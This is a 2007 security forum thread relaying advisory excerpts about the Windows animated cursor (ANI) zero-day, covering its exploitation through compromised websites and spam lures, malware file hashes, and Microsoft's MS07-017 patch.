0-Day vuln Exploit in the wild - Animated Cursor

[AplusWebMaster]

FYI...

MS to Release Out-of-Schedule Patch for ANI Vuln
- http://isc.sans.org/diary.html?storyid=2555
Last Updated: 2007-04-02 03:39:56 UTC
"...The Microsoft Security Response Center blog reports* that they "have been working around the clock to test this update and are currently planning to release the security update that addresses this (ANI) issue on Tuesday April 3, 2007."
This is further supported here: http://www.microsoft.com/technet/sec...n/advance.mspx ."

* http://preview.tinyurl.com/35tyyt
(MSRC)

.

[AplusWebMaster]

FYI...

Compromised sites using ANI exploit code
- http://www.websense.com/securitylabs...php?BlogID=119
Apr 2 2007 3:15PM ~ "Websense's ThreatSeeker(tm) technology has discovered that a large set of websites have been compromised within the Asia Pacific Region and have embedded IFRAMES within them pointing to a site that is hosting the ANI exploit code. An IFRAME or "invisible frame" is an element which makes it possible to embed another HTML document inside the main document. From Wikipedia: http://en.wikipedia.org/wiki/Iframe.
Although we are tracking hundreds of other sites that are hosting ANI exploit files this alert pertains to one group of sites that are all connecting to the same host. Many of the sites appear to be running online blogs or message boards. Most sites have embedded IFRAME's on all pages leading to a main set of sites which are hosting the exploit code. The number of unique sites currently up and running for this one attack is greater than 50 and the number of pages is greater than 500. Assuming users connect to the sites they will be redirected to two unique locations which are hosting exploit code which in turn downloads and installs a file called "ad.exe". The file includes a generic password stealer and is not detected well by most Antivirus companies (MD5 0c9217553871d3eb5f20b553d91a098b)..."

(Screenshots available at the URL above.)

[AplusWebMaster]

FYI...

Malicious Code: Email Lures for ANI Zero-Day
- http://www.websense.com/securitylabs...hp?AlertID=764
April 03, 2007 ~ "Websense Security Labs(TM) has discovered a large email spam run that includes links to sites that are hosting ANI exploit code. Users receive an email with the subject line "Hot Pictures of Britiney Speers" that is written in HTML and has anti-spam avoidance text within the HTML comments. Users who click on the links are redirected to one of several websites that we are tracking. The sites contain obfuscated JavaScript. The decoded JavaScript sends all users to the same website, which is hosting the exploit code. When users connect, a file is downloaded and installed without any end-user interaction. The file is called 200.exe with the MD5 of b017cae51e4498c309690b8936f2fa79. The binary file appears to be a new variant of a file infector with operating system hooks and spamming capabilities. A more complete analysis will soon appear on our blog. The main server that hosts the exploit code is hosted in Russia and has been used by groups that have installed rootkits, password stealing Trojans, and other nefarious code in the past..."

(Screenshots available at the URL above.)


> http://www.websense.com/securitylabs...php?BlogID=120
Apr 3 2007 ~ "This is a follow-up to our post from yesterday (see: http://www.websense.com/securitylabs...php?BlogID=119 ). We are now actively tracking more than 450 unique websites which have been compromised. Most of the sites have ALL pages infected within the site which add up to tens of thousands of pages with exploit code links on them. We are working with several groups to attempt to get these sites shutdown. As previously stated, users who visit one of the thousands of pages will be infected with a generic password stealer that will run without any user-interaction..."

[AplusWebMaster]

FYI...

MS07-017 patch released
- http://forums.spybot.info/showpost.p...4&postcount=26

[md usa spybot fan]

AplusWebMaster:

Damn are you on top of this stuff. I checked for Windows updates a half-an-hour ago and there were none. Thanks for your concern and attention to breaking security issues.

Security Update for Windows XP (KB925902) requires a restart. See you in a few minutes.

Regards,
md usa spybot fan

[AplusWebMaster]

...on top of this stuff.

As opposed to the other choice, that's where we need to be.

[AplusWebMaster]

FYI...


MS07-017 / MS07-008 conflict (?) fix...
- http://forums.spybot.info/showpost.p...1&postcount=27
"...having problems with the patch..."

[AplusWebMaster]

FYI...

- http://www.pcworld.com/printable/art...printable.html
April 03, 2007 ~ "Contrary to other reports, Mozilla's Firefox 2.0 is vulnerable to attackers armed with the Windows animated (ANI) cursor exploit... Alexander Sotirov, the vulnerability researcher at Determina who discovered the ANI flaw last December and notified Microsoft of it later that month, yesterday posted a demonstration of an ANI exploit that hijacks a PC when Firefox users are conned into visiting a malicious site... "It turns out that Firefox uses the same vulnerable Windows component to process .ani files, which can be exploited in a way similar to Internet Explorer," Sotirov said... "

.

[AplusWebMaster]

FYI...

ASUS gets ANI'd
- http://www.securityfocus.com/brief/477
2007-04-06 ~ "...The Web site of motherboard maker ASUS reportedly* got hit by a group of online vandals, who added an iframe redirect to a malicious download site that attempts to infect visitors via the ANI flaw. Leveraging hacked, but legitimate, Web sites to propagate malicious code has become a major vector to compromise end users..."
* http://www.viruslist.com/en/weblog?weblogid=208187358

[AplusWebMaster]

FYI...

Compromised Web Servers Plotted
- http://www.websense.com/securitylabs...php?BlogID=122
Apr 9 2007 ~ "...Now... are more than 2000 unique sites that are hosting exploit code and/or are compromised and are pointing to machines that host exploit code. There are two main attacks that comprise of the majority of these sites. The first set we believe are one of the first groups to start using the zero-day exploits in the wild. These are attacks that started in the China region and appear to be created by groups within the Asia Pacific Region. The attackers have compromised hundreds of machines and placed IFRAME's back to the main servers that host the exploit code. In most cases the payload and motivation of these attacks is to gather credentials for online games such as lineage. Lineage is a very popular online game in Asia.
The second set of attacks started just a couple days ago appear to be from a group in Eastern Europe. This group has been placing exploit code on sites for many years now and has a very resilient infrastructure. They have used WMF, VML, and several other exploits in there routines previously. As of now they have also added the ANI attacks to their arsenal. The payload and motivation is somewhat different however as they are more known to install rootkit's and crimeware which is designed to install form grabbing software and keyloggers in order to compromise end-user banking details. Also in the past they have installed fake anti-spyware software as a distraction and as a means to falsify someone into acquiring some anti-spyware software.
The below map took all the websites we have classified that have been compromised by one of these two parties and plotted them on the map. Note: we plotted by country not by city! What you can see, with some minor exceptions, is that the first attacker set are going after servers, and presumably users in China, whereas the second attacker set are going after servers, and users in America..."

(Graphic available at the URL above.)

.